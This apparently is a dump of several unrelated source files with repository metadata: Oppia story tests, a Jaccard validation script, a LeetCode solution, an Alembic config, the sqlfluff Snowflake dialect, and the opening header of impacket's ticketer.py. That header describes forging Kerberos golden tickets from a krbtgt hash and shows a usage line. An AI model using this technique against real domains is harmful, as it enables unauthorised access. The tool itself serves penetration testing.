[self.NODE_ID_2, self.NODE_ID_3, self.NODE_ID_4])
def test_get_latest_completed_node_ids_multiple_completions(self):
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_4)
self.assertEqual(
story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID),
[self.NODE_ID_2, self.NODE_ID_3, self.NODE_ID_4])
def test_get_completed_nodes_in_story(self):
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
for ind, completed_node in enumerate(
story_fetchers.get_completed_nodes_in_story(
self.owner_id, self.STORY_1_ID)):
self.assertEqual(
completed_node.to_dict(), self.nodes[ind].to_dict())
def test_get_pending_and_all_nodes_in_story(self):
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
# The starting index is 1 because the first story node is completed,
# and the pending nodes will start from the second node.
for index, pending_node in enumerate(
story_fetchers.get_pending_and_all_nodes_in_story(
self.owner_id, self.STORY_1_ID)['pending_nodes'], start=1):
self.assertEqual(
pending_node.to_dict(), self.nodes[index].to_dict())
def test_record_completed_node_in_story_context(self):
        # Ensure that nodes completed within the context of a story are
# recorded correctly. This test actually validates both
# test_get_completed_node_ids and
# test_get_next_node_id_to_be_completed_by_user.
# By default, no completion model should exist for a given user and
# story.
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertIsNone(completion_model)
        # If the user 'completes a node', the model should record it.
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertIsNotNone(completion_model)
self.assertEqual(
completion_model.completed_node_ids, [
self.NODE_ID_1])
# If the same node is completed again within the context of this
# story, it should not be duplicated.
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertEqual(
completion_model.completed_node_ids, [
self.NODE_ID_1])
# If the same node and another are completed within the context
# of a different story, it shouldn't affect this one.
self.save_new_story(self.STORY_ID_1, self.USER_ID, self.TOPIC_ID)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, self.STORY_ID_1)
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_ID_1, self.NODE_ID_1)
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_ID_1, self.NODE_ID_2)
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertEqual(
completion_model.completed_node_ids, [
self.NODE_ID_1])
# If two more nodes are completed, they are recorded.
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertEqual(
completion_model.completed_node_ids, [
self.NODE_ID_1, self.NODE_ID_2, self.NODE_ID_3])
class StoryContentsMigrationTests(test_utils.GenericTestBase):
def test_migrate_story_contents_to_latest_schema(self):
story_id = story_services.get_new_story_id()
topic_id = topic_fetchers.get_new_topic_id()
user_id = 'user_id'
self.save_new_topic(
topic_id, user_id, name='Topic',
abbreviated_name='topic-three', url_fragment='topic-three',
description='A new topic',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[], subtopics=[], next_subtopic_id=0)
story_model = story_models.StoryModel(
id=story_id,
description='Description',
title='Title',
language_code='1',
story_contents_schema_version=1,
notes='Notes',
corresponding_topic_id=topic_id,
story_contents=self.VERSION_1_STORY_CONTENTS_DICT
)
current_schema_version_swap = self.swap(
feconf, 'CURRENT_STORY_CONTENTS_SCHEMA_VERSION', 5)
with current_schema_version_swap:
story = story_fetchers.get_story_from_model(story_model)
self.assertEqual(story.story_contents_schema_version, 5)
self.assertEqual(
story.story_contents.to_dict(), self.VERSION_5_STORY_CONTENTS_DICT)
| 42.633006 | 80 | 0.614747 |
d7f1ce9654a4daebe7ad3dc3f19e224f0716bfa4 | 4,525 | py | Python | src/validation_jaccard_index.py | uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public | 177eca4992cfdfac49c135f5597904182748b873 | [
"MIT"
] | 2 | 2020-03-05T23:30:05.000Z | 2021-01-10T20:48:47.000Z | src/validation_jaccard_index.py | uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public | 177eca4992cfdfac49c135f5597904182748b873 | [
"MIT"
] | null | null | null | src/validation_jaccard_index.py | uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public | 177eca4992cfdfac49c135f5597904182748b873 | [
"MIT"
] | 1 | 2020-04-05T15:00:26.000Z | 2020-04-05T15:00:26.000Z | import pandas as pd
import global_variables as v
def validation(manually_tagged_rows, automatically_tagged_rows, delimiter):
correct = 0
incorrect = 0
ignored = 0
final_jaccard_index = 0
jaccard_count = 0
recordCount = 0
    zeroTaggedCount = 0
for index, row in manually_tagged_rows.iterrows(): # for each manually tagged record
#print(row)
true_tokens = row['tagged_record'].split(' ')
row_number = row['row_number']
final_tokens = []
generated_tokens = []
for true_token in true_tokens:
if delimiter in true_token: # if something is tagged as symptom/state
true_token = true_token.replace('-', ' ') # remove punctuation from results
true_token = true_token.replace(delimiter, ' ') # remove delimiter from results
final_tokens.append(true_token.strip())
test_tokens = automatically_tagged_rows.iloc[row_number - 1] # get the corresponding auto tagged record
test_tokens = test_tokens['tagged_sentence'].split(' ')
for test_token in test_tokens:
if delimiter in test_token:
test_token = test_token.replace('-', ' ') # remove punctuation from results
test_token = test_token.replace(delimiter, ' ') # remove delimiter from results
generated_tokens.append(test_token.strip())
        if len(final_tokens) == 0:
ignored += 1
elif final_tokens == generated_tokens:
correct += 1
else:
incorrect += 1
        if len(final_tokens) == 0 or len(generated_tokens) == 0:
            # Skip records where either the manual or the automatic tagging
            # produced no phrases at all.
            pass
        else:
            # Per-record Jaccard index: |intersection| / |union| of the
            # manually tagged and automatically tagged phrase sets.
            common_phrases = list(set(final_tokens).intersection(generated_tokens))
            all_phrases = list(set(final_tokens + generated_tokens))
            jaccard_count = jaccard_count + len(common_phrases) / len(all_phrases)
            recordCount = recordCount + 1
print('correct:')
print(correct)
print('incorrect:')
print(incorrect)
print('% correct:')
print((correct/(incorrect+correct))*100)
final_jaccard_index = jaccard_count/recordCount
print('jaccard_index:')
print(final_jaccard_index)
print(zeroTaggedCount)
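# For reference: the per-record score accumulated above is the Jaccard index of
# the two phrase sets, i.e. |intersection| / |union|. A minimal standalone
# sketch (not part of the original pipeline):
#   def jaccard(a, b):
#       a, b = set(a), set(b)
#       return len(a & b) / len(a | b) if (a | b) else 0.0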
manually_tagged_data = pd.read_excel(v.validation_path, sheet_name=v.input_file_sheet_name)
def main():
print("Starting Pipeline Validation")
print("Validating Symptom/State Tagged Records") # 82% # JI:0.823
data = pd.read_excel(v.symptom_state_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.symptom_state_tag_symbol)
print("Validating Maintenance Activity Tagged Records") # 86% # JI:0.897
data = pd.read_excel(v.maintenance_activity_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.maintenance_activity_tag_symbol)
print("Validating Maintenance Item Tagged Records") # 34% # JI:0.359
data = pd.read_excel(v.maintenance_item_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.maintenance_item_tag_symbol)
### Baseline validation
print("Validating Symptom/State Tagged Records") # 82%
print(v.baseline_output_path)
data = pd.read_excel(v.baseline_output_path, sheet_name=v.input_file_sheet_name)
print('here')
validation(manually_tagged_data, data, v.symptom_state_tag_symbol)
print("Validating Maintenance Activity Tagged Records") # 69%
data = pd.read_excel(v.baseline_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.maintenance_activity_tag_symbol)
print("Validating Maintenance Item Tagged Records") # 24%
data = pd.read_excel(v.baseline_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.maintenance_item_tag_symbol)
print("Validation Finished")
if __name__ == "__main__":
main() | 38.675214 | 111 | 0.675138 |
1379d320044ca616b0c7409e8afe5c8f388e060e | 532 | py | Python | leetcode/946. Validate Stack Sequences/soln.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 3 | 2017-02-15T20:55:04.000Z | 2018-09-26T18:48:24.000Z | leetcode/946. Validate Stack Sequences/soln.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 4 | 2017-10-07T18:59:20.000Z | 2019-10-08T05:43:25.000Z | leetcode/946. Validate Stack Sequences/soln.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 1 | 2017-10-08T06:52:21.000Z | 2017-10-08T06:52:21.000Z | class Solution:
def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:
st = []
i, j = 0, 0
while i < len(pushed) and j < len(popped):
            # Let's start by pushing an element
st.append(pushed[i])
# Now try popping as much as possible
while st and j < len(popped) and (st[-1] == popped[j]):
st.pop()
j += 1
i += 1
        return j == len(popped)
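# Example usage (hypothetical; assumes "from typing import List" when run
# outside the LeetCode harness, which normally provides it):
#   Solution().validateStackSequences([1, 2, 3, 4, 5], [4, 5, 3, 2, 1])  # -> True
#   Solution().validateStackSequences([1, 2, 3, 4, 5], [4, 3, 5, 1, 2])  # -> False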
| 31.294118 | 83 | 0.469925 |
4a7a44fbd6619870d43d004ff6c5a1401c2fba3c | 2,155 | py | Python | alembic/env.py | sheeley/Safe-Streets-Event-Tracker | 0b312f7476e4f5b25bf66cfd4038301a5615fcdb | [
"MIT"
] | 1 | 2016-02-11T06:13:25.000Z | 2016-02-11T06:13:25.000Z | alembic/env.py | sheeley/Safe-Streets-Event-Tracker | 0b312f7476e4f5b25bf66cfd4038301a5615fcdb | [
"MIT"
] | 8 | 2015-04-09T03:38:18.000Z | 2015-05-28T16:33:54.000Z | alembic/env.py | sheeley/Safe-Streets-Event-Tracker | 0b312f7476e4f5b25bf66cfd4038301a5615fcdb | [
"MIT"
] | null | null | null | from __future__ import with_statement
from alembic import context
from sqlalchemy import create_engine, pool
from logging.config import fileConfig
from os import environ
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = None
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
env_db = environ.get('DATABASE_URL')
SQLALCHEMY_DATABASE_URI = env_db if env_db else config.get_main_option("sqlalchemy.url")
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
context.configure(
url=SQLALCHEMY_DATABASE_URI, target_metadata=target_metadata, literal_binds=True)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
connectable = create_engine(SQLALCHEMY_DATABASE_URI)
# engine_from_config(
# config.get_section(config.config_ini_section),
# prefix='sqlalchemy.',
# poolclass=pool.NullPool)
with connectable.connect() as connection:
context.configure(
connection=connection,
target_metadata=target_metadata
)
with context.begin_transaction():
context.run_migrations()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
| 28.733333 | 89 | 0.732715 |
8eaa00e9b8d1193c79f4c40c8d8497d7c49955c3 | 18,925 | py | Python | src/sqlfluff/dialects/dialect_snowflake.py | swanderz/sqlfluff | 668f23500ce5d06f4de67333a8957811c2df485f | [
"MIT"
] | null | null | null | src/sqlfluff/dialects/dialect_snowflake.py | swanderz/sqlfluff | 668f23500ce5d06f4de67333a8957811c2df485f | [
"MIT"
] | null | null | null | src/sqlfluff/dialects/dialect_snowflake.py | swanderz/sqlfluff | 668f23500ce5d06f4de67333a8957811c2df485f | [
"MIT"
] | null | null | null | """The Snowflake dialect.
Inherits from Postgres.
Based on https://docs.snowflake.com/en/sql-reference-commands.html
"""
from sqlfluff.core.dialects import load_raw_dialect
from sqlfluff.core.parser import (
BaseSegment,
NamedSegment,
OneOf,
Ref,
Sequence,
AnyNumberOf,
ReSegment,
SymbolSegment,
Bracketed,
Anything,
Delimited,
StartsWith,
Indent,
Dedent,
)
ansi_dialect = load_raw_dialect("ansi")
postgres_dialect = load_raw_dialect("postgres")
snowflake_dialect = postgres_dialect.copy_as("snowflake")
snowflake_dialect.patch_lexer_struct(
[
# In snowflake, a double single quote resolves as a single quote in the string.
# https://docs.snowflake.com/en/sql-reference/data-types-text.html#single-quoted-string-constants
("single_quote", "regex", r"'([^']|'')*'", dict(is_code=True)),
]
)
snowflake_dialect.insert_lexer_struct(
# Keyword assigner needed for keyword functions.
[("parameter_assigner", "regex", r"=>", dict(is_code=True))],
before="not_equal",
)
snowflake_dialect.insert_lexer_struct(
# Column selector
# https://docs.snowflake.com/en/sql-reference/sql/select.html#parameters
[("column_selector", "regex", r"\$[0-9]+", dict(is_code=True))],
before="not_equal",
)
snowflake_dialect.sets("unreserved_keywords").update(
[
"API",
"AUTHORIZATIONS",
"BERNOULLI",
"BLOCK",
"DELEGATED",
"HISTORY",
"LATERAL",
"NETWORK",
"PIPE",
"PIPES",
"QUERIES",
"REGIONS",
"REMOVE",
"SECURE",
"SEED",
"TERSE",
"UNSET",
]
)
snowflake_dialect.sets("reserved_keywords").update(
[
"CLONE",
"MASKING",
"NOTIFICATION",
"PIVOT",
"SAMPLE",
"TABLESAMPLE",
"UNPIVOT",
]
)
snowflake_dialect.add(
# In snowflake, these are case sensitive even though they're not quoted
# so they need a different `name` and `type` so they're not picked up
# by other rules.
ParameterAssignerSegment=SymbolSegment.make(
"=>", name="parameter_assigner", type="parameter_assigner"
),
NakedSemiStructuredElementSegment=ReSegment.make(
r"[A-Z0-9_]*",
name="naked_semi_structured_element",
type="semi_structured_element",
),
QuotedSemiStructuredElementSegment=NamedSegment.make(
"double_quote",
name="quoted_semi_structured_element",
type="semi_structured_element",
),
ColumnIndexIdentifierSegment=ReSegment.make(
r"\$[0-9]+", name="column_index_identifier_segment", type="identifier"
),
)
snowflake_dialect.replace(
Accessor_Grammar=AnyNumberOf(
Ref("ArrayAccessorSegment"),
# Add in semi structured expressions
Ref("SemiStructuredAccessorSegment"),
),
PreTableFunctionKeywordsGrammar=OneOf(Ref("LateralKeywordSegment")),
FunctionContentsExpressionGrammar=OneOf(
Ref("DatetimeUnitSegment"),
Ref("NamedParameterExpressionSegment"),
Sequence(
Ref("ExpressionSegment"),
Sequence(OneOf("IGNORE", "RESPECT"), "NULLS", optional=True),
),
),
JoinLikeClauseGrammar=Sequence(
AnyNumberOf(
Ref("FromAtExpressionSegment"),
Ref("FromBeforeExpressionSegment"),
Ref("FromPivotExpressionSegment"),
Ref("FromUnpivotExpressionSegment"),
Ref("SamplingExpressionSegment"),
min_times=1,
),
Ref("TableAliasExpressionSegment", optional=True),
),
SingleIdentifierGrammar=OneOf(
Ref("NakedIdentifierSegment"),
Ref("QuotedIdentifierSegment"),
Ref("ColumnIndexIdentifierSegment"),
),
PostFunctionGrammar=Sequence(
Ref("WithinGroupClauseSegment", optional=True),
Sequence(OneOf("IGNORE", "RESPECT"), "NULLS", optional=True),
Ref("OverClauseSegment", optional=True),
),
)
@snowflake_dialect.segment(replace=True)
class StatementSegment(ansi_dialect.get_segment("StatementSegment")): # type: ignore
"""A generic segment, to any of its child subsegments."""
parse_grammar = ansi_dialect.get_segment("StatementSegment").parse_grammar.copy(
insert=[
Ref("UseStatementSegment"),
Ref("CreateStatementSegment"),
Ref("CreateCloneStatementSegment"),
Ref("ShowStatementSegment"),
Ref("AlterUserSegment"),
],
remove=[
Ref("CreateTypeStatementSegment"),
Ref("CreateExtensionStatementSegment"),
Ref("CreateIndexStatementSegment"),
Ref("DropIndexStatementSegment"),
Ref("CreateFunctionStatementSegment"),
],
)
@snowflake_dialect.segment()
class CreateStatementCommentSegment(BaseSegment):
"""A comment in a create statement.
e.g. comment = 'a new view'
"""
type = "snowflake_comment"
match_grammar = Sequence(
Ref.keyword("COMMENT"),
Ref("EqualsSegment"),
Ref("LiteralGrammar"),
)
@snowflake_dialect.segment()
class TableAliasExpressionSegment(BaseSegment):
"""A reference to an object with an `AS` clause, optionally with column aliasing."""
type = "table_alias_expression"
match_grammar = Sequence(
Ref("AliasExpressionSegment"),
# Optional column aliases too.
Bracketed(
Delimited(Ref("SingleIdentifierGrammar"), delimiter=Ref("CommaSegment")),
optional=True,
),
)
@snowflake_dialect.segment()
class FromAtExpressionSegment(BaseSegment):
"""An AT expression."""
type = "from_at_expression"
match_grammar = Sequence("AT", Bracketed(Anything()))
parse_grammar = Sequence(
"AT",
Bracketed(
OneOf("TIMESTAMP", "OFFSET", "STATEMENT"),
Ref("ParameterAssignerSegment"),
Ref("ExpressionSegment"),
),
)
@snowflake_dialect.segment()
class FromBeforeExpressionSegment(BaseSegment):
"""A BEFORE expression."""
type = "from_before_expression"
match_grammar = Sequence("BEFORE", Bracketed(Anything()))
parse_grammar = Sequence(
"BEFORE",
Bracketed(
OneOf("TIMESTAMP", "OFFSET", "STATEMENT"),
Ref("ParameterAssignerSegment"),
Ref("ExpressionSegment"),
),
)
@snowflake_dialect.segment()
class FromPivotExpressionSegment(BaseSegment):
"""A PIVOT expression."""
type = "from_pivot_expression"
match_grammar = Sequence("PIVOT", Bracketed(Anything()))
parse_grammar = Sequence(
"PIVOT",
Bracketed(
Ref("FunctionSegment"),
"FOR",
Ref("SingleIdentifierGrammar"),
"IN",
Bracketed(Delimited(Ref("LiteralGrammar"), delimiter=Ref("CommaSegment"))),
),
)
@snowflake_dialect.segment()
class FromUnpivotExpressionSegment(BaseSegment):
"""An UNPIVOT expression."""
type = "from_unpivot_expression"
match_grammar = Sequence("UNPIVOT", Bracketed(Anything()))
parse_grammar = Sequence(
"UNPIVOT",
Bracketed(
Ref("SingleIdentifierGrammar"),
"FOR",
Ref("SingleIdentifierGrammar"),
"IN",
Bracketed(
Delimited(Ref("SingleIdentifierGrammar"), delimiter=Ref("CommaSegment"))
),
),
)
@snowflake_dialect.segment()
class SamplingExpressionSegment(BaseSegment):
"""A sampling expression."""
type = "snowflake_sample_expression"
match_grammar = Sequence(
OneOf("SAMPLE", "TABLESAMPLE"),
OneOf("BERNOULLI", "ROW", "SYSTEM", "BLOCK", optional=True),
Bracketed(Ref("NumericLiteralSegment"), Ref.keyword("ROWS", optional=True)),
Sequence(
OneOf("REPEATABLE", "SEED"),
Bracketed(Ref("NumericLiteralSegment")),
optional=True,
),
)
@snowflake_dialect.segment()
class NamedParameterExpressionSegment(BaseSegment):
"""A keyword expression.
e.g. 'input => custom_fields'
"""
type = "snowflake_keyword_expression"
match_grammar = Sequence(
Ref("ParameterNameSegment"),
Ref("ParameterAssignerSegment"),
OneOf(
Ref("LiteralGrammar"),
Ref("ColumnReferenceSegment"),
Ref("ExpressionSegment"),
),
)
@snowflake_dialect.segment()
class SemiStructuredAccessorSegment(BaseSegment):
"""A semi-structured data accessor segment.
https://docs.snowflake.com/en/user-guide/semistructured-considerations.html
"""
type = "snowflake_semi_structured_expression"
match_grammar = Sequence(
Ref("ColonSegment"),
OneOf(
Ref("NakedSemiStructuredElementSegment"),
Ref("QuotedSemiStructuredElementSegment"),
),
Ref("ArrayAccessorSegment", optional=True),
AnyNumberOf(
Sequence(
OneOf(
# Can be delimited by dots or colons
Ref("DotSegment"),
Ref("ColonSegment"),
),
OneOf(
Ref("NakedSemiStructuredElementSegment"),
Ref("QuotedSemiStructuredElementSegment"),
),
Ref("ArrayAccessorSegment", optional=True),
allow_gaps=True,
),
allow_gaps=True,
),
allow_gaps=True,
)
@snowflake_dialect.segment(replace=True)
class SelectClauseModifierSegment(
ansi_dialect.get_segment("SelectClauseModifierSegment") # type: ignore
):
"""Things that come after SELECT but before the columns.
In snowflake we go back to similar functionality as the ANSI
version in the root dialect, without the things added in
postgres.
"""
@snowflake_dialect.segment()
class QualifyClauseSegment(BaseSegment):
"""A `QUALIFY` clause like in `SELECT`.
https://docs.snowflake.com/en/sql-reference/constructs/qualify.html
"""
type = "having_clause"
match_grammar = StartsWith(
"QUALIFY",
terminator=OneOf(
"ORDER",
"LIMIT",
),
)
parse_grammar = Sequence(
"QUALIFY",
Indent,
OneOf(
Bracketed(
Ref("ExpressionSegment"),
),
Ref("ExpressionSegment"),
),
Dedent,
)
@snowflake_dialect.segment(replace=True)
class SelectStatementSegment(ansi_dialect.get_segment("SelectStatementSegment")): # type: ignore
"""A snowflake `SELECT` statement including optional Qualify.
https://docs.snowflake.com/en/sql-reference/constructs/qualify.html
"""
type = "select_statement"
match_grammar = StartsWith(
# NB: In bigquery, the select clause may include an EXCEPT, which
# will also match the set operator, but by starting with the whole
# select clause rather than just the SELECT keyword, we normally
# mitigate that here. But this isn't BigQuery! So we can be more
        # efficient and just use the keyword.
"SELECT",
terminator=Ref("SetOperatorSegment"),
)
parse_grammar = ansi_dialect.get_segment(
"SelectStatementSegment"
).parse_grammar.copy(
insert=[Ref("QualifyClauseSegment", optional=True)],
before=Ref("OrderByClauseSegment", optional=True),
)
@snowflake_dialect.segment()
class UseStatementSegment(BaseSegment):
"""A snowflake `USE` statement.
https://docs.snowflake.com/en/sql-reference/sql/use.html
"""
type = "use_statement"
match_grammar = StartsWith("USE")
parse_grammar = Sequence(
"USE",
OneOf("ROLE", "WAREHOUSE", "DATABASE", "SCHEMA", optional=True),
Ref("ObjectReferenceSegment"),
)
@snowflake_dialect.segment()
class CreateCloneStatementSegment(BaseSegment):
"""A snowflake `CREATE ... CLONE` statement.
https://docs.snowflake.com/en/sql-reference/sql/create-clone.html
"""
type = "create_clone_statement"
match_grammar = Sequence(
"CREATE",
Sequence("OR", "REPLACE", optional=True),
OneOf(
"DATABASE",
"SCHEMA",
"TABLE",
"SEQUENCE",
Sequence("FILE", "FORMAT"),
"STAGE",
"STREAM",
"TASK",
),
Sequence("IF", "NOT", "EXISTS", optional=True),
Ref("SingleIdentifierGrammar"),
"CLONE",
Ref("SingleIdentifierGrammar"),
OneOf(
Ref("FromAtExpressionSegment"),
Ref("FromBeforeExpressionSegment"),
optional=True,
),
)
@snowflake_dialect.segment()
class CreateStatementSegment(BaseSegment):
"""A snowflake `CREATE` statement.
https://docs.snowflake.com/en/sql-reference/sql/create.html
"""
type = "create_statement"
match_grammar = Sequence(
"CREATE",
Sequence("OR", "REPLACE", optional=True),
OneOf(
Sequence("NETWORK", "POLICY"),
Sequence("RESOURCE", "MONITOR"),
"SHARE",
"ROLE",
"USER",
"WAREHOUSE",
Sequence("NOTIFICATION", "INTEGRATION"),
Sequence("SECURITY", "INTEGRATION"),
Sequence("STORAGE", "INTEGRATION"),
Sequence("EXTERNAL", "TABLE"),
"VIEW",
Sequence("MATERIALIZED", "VIEW"),
Sequence("SECURE", "VIEW"),
Sequence("MASKING", "POLICY"),
"PIPE",
"FUNCTION",
Sequence("EXTERNAL", "FUNCTION"),
"PROCEDURE",
# Objects that also support clone
"DATABASE",
"SCHEMA",
"TABLE",
"SEQUENCE",
Sequence("FILE", "FORMAT"),
"STAGE",
"STREAM",
"TASK",
),
Sequence("IF", "NOT", "EXISTS", optional=True),
Ref("ObjectReferenceSegment"),
Ref("CreateStatementCommentSegment", optional=True),
Ref.keyword("AS", optional=True),
Ref("SelectStatementSegment", optional=True),
)
@snowflake_dialect.segment()
class ShowStatementSegment(BaseSegment):
"""A snowflake `SHOW` statement.
https://docs.snowflake.com/en/sql-reference/sql/show.html
"""
_object_types_plural = OneOf(
"PARAMETERS",
Sequence("GLOBAL", "ACCOUNTS"),
"REGIONS",
Sequence("REPLICATION", "ACCOUNTS"),
Sequence("REPLICATION", "DATABASES"),
"PARAMETERS",
"VARIABLES",
"TRANSACTIONS",
"LOCKS",
"PARAMETERS",
"FUNCTIONS",
Sequence("NETWORK", "POLICIES"),
"SHARES",
"ROLES",
"GRANTS",
"USERS",
"WAREHOUSES",
"DATABASES",
Sequence(
OneOf("API", "NOTIFICATION", "SECURITY", "STORAGE", optional=True),
"INTEGRATIONS",
),
"SCHEMAS",
"OBJECTS",
"TABLES",
Sequence("EXTERNAL", "TABLES"),
"VIEWS",
Sequence("MATERIALIZED", "VIEWS"),
Sequence("MASKING", "POLICIES"),
"COLUMNS",
Sequence("FILE", "FORMATS"),
"SEQUENCES",
"STAGES",
"PIPES",
"STREAMS",
"TASKS",
Sequence("USER", "FUNCTIONS"),
Sequence("EXTERNAL", "FUNCTIONS"),
"PROCEDURES",
Sequence("FUTURE", "GRANTS"),
)
_object_scope_types = OneOf(
"ACCOUNT",
"SESSION",
Sequence(
OneOf(
"DATABASE",
"SCHEMA",
"SHARE",
"ROLE",
"TABLE",
"TASK",
"USER",
"WAREHOUSE",
"VIEW",
),
Ref("ObjectReferenceSegment", optional=True),
),
)
type = "show_statement"
match_grammar = Sequence(
"SHOW",
OneOf("TERSE", optional=True),
_object_types_plural,
OneOf("HISTORY", optional=True),
Sequence("LIKE", Ref("QuotedLiteralSegment"), optional=True),
Sequence(
OneOf("ON", "TO", "OF", "IN"),
OneOf(
Sequence(_object_scope_types),
Ref("ObjectReferenceSegment"),
),
optional=True,
),
Sequence("STARTS", "WITH", Ref("QuotedLiteralSegment"), optional=True),
Sequence("WITH", "PRIMARY", Ref("ObjectReferenceSegment"), optional=True),
Sequence(
Ref("LimitClauseSegment"),
Sequence("FROM", Ref("QuotedLiteralSegment"), optional=True),
optional=True,
),
)
@snowflake_dialect.segment()
class AlterUserSegment(BaseSegment):
"""`ALTER USER` statement.
https://docs.snowflake.com/en/sql-reference/sql/alter-user.html
All user parameters can be found here
https://docs.snowflake.com/en/sql-reference/parameters.html
"""
type = "alter_user"
match_grammar = StartsWith(
Sequence("ALTER", "USER"),
)
parse_grammar = Sequence(
"ALTER",
"USER",
Sequence("IF", "EXISTS", optional=True),
Ref("ObjectReferenceSegment"),
OneOf(
Sequence("RENAME", "TO", Ref("ObjectReferenceSegment")),
Sequence("RESET", "PASSWORD"),
Sequence("ABORT", "ALL", "QUERIES"),
Sequence(
"ADD",
"DELEGATED",
"AUTHORIZATION",
"OF",
"ROLE",
Ref("ObjectReferenceSegment"),
"TO",
"SECURITY",
"INTEGRATION",
Ref("ObjectReferenceSegment"),
),
Sequence(
"REMOVE",
"DELEGATED",
OneOf(
Sequence(
"AUTHORIZATION", "OF", "ROLE", Ref("ObjectReferenceSegment")
),
"AUTHORIZATIONS",
),
"FROM",
"SECURITY",
"INTEGRATION",
Ref("ObjectReferenceSegment"),
),
            # Snowflake supports the SET command with space-delimited parameters, but it also supports
# using commas which is better supported by `Delimited`, so we will just use that.
Sequence(
"SET",
Delimited(
Sequence(
Ref("ParameterNameSegment"),
Ref("EqualsSegment"),
OneOf(Ref("LiteralGrammar"), Ref("ObjectReferenceSegment")),
),
),
),
Sequence("UNSET", Delimited(Ref("ParameterNameSegment"))),
),
)
| 28.078635 | 105 | 0.57395 |
8b50d1da8b365e4e1f065e7d052ddbaa27969c22 | 42,528 | py | Python | tools/impackets/build/scripts-3.8/ticketer.py | c0axial/hackthebox | db9fa3d7b75bf779399d17f8923ff743379631be | [
"MIT"
] | 1 | 2021-03-15T20:05:05.000Z | 2021-03-15T20:05:05.000Z | tools/impackets/build/scripts-3.8/ticketer.py | oppsec/hackthebox | dd33e0f182af1ad28812af9662d47bdbbcbea9d3 | [
"MIT"
] | null | null | null | tools/impackets/build/scripts-3.8/ticketer.py | oppsec/hackthebox | dd33e0f182af1ad28812af9662d47bdbbcbea9d3 | [
"MIT"
] | 1 | 2020-12-29T14:00:13.000Z | 2020-12-29T14:00:13.000Z | #!/usr/bin/python3
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This script will create TGT/TGS tickets from scratch or based on a template (legally requested from the KDC)
# allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the
# groups, extrasids, etc.
# Tickets duration is fixed to 10 years from now (although you can manually change it)
#
# References:
# Original presentation at BlackHat USA 2014 by @gentilkiwi and @passingthehash:
# (https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it)
# Original implementation by Benjamin Delpy (@gentilkiwi) in mimikatz
# (https://github.com/gentilkiwi/mimikatz)
#
# Examples:
# ./ticketer.py -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser
#
#   will create and save a golden ticket for user 'baduser' that will be all encrypted/signed using RC4.
# If you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256
# (depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as
# baduser.ccache.
#
# ./ticketer.py -nthash <krbtgt/service nthash> -aesKey <krbtgt/service AES> -domain-sid <your domain SID> -domain <your domain FQDN>
# -request -user <a valid domain user> -password <valid domain user's password> baduser
#
# will first authenticate against the KDC (using -user/-password) and get a TGT that will be used
